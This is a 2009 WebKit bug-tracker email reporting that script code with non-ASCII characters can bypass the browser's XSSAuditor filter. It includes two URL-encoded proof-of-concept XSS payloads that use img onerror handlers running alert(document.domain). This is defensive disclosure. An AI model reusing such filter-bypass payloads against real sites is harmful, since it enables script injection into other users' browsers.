[Webkit-unassigned] [Bug 29511] New: [XSSAuditor] Script source code that contains non-ASCII characters may bypass the XSSAuditor

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Fri Sep 18 17:10:05 PDT 2009


https://bugs.webkit.org/show_bug.cgi?id=29511

           Summary: [XSSAuditor] Script source code that contains
                    non-ASCII characters may bypass the XSSAuditor
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: All
        OS/Version: All
            Status: NEW
          Keywords: XSSAuditor
          Severity: Normal
          Priority: P2
         Component: WebCore Misc.
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: dbates at webkit.org
                CC: mario.heiderich at gmail.com, sam at webkit.org,
                    abarth at webkit.org


Script source code that contains non-ASCII characters may bypass the
XSSAuditor.

For example:

http://eaea.sirdarckcat.net/xss.php?html_xss=%3Cimg+src=%220%22+onerror=%22/%80/;alert(document.domain)%22%3E

http://eaea.sirdarckcat.net/xss.php?html_xss=%3Cimg+src='%80'+onerror=%27alert(document.domain)%27

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.



More information about the webkit-unassigned mailing list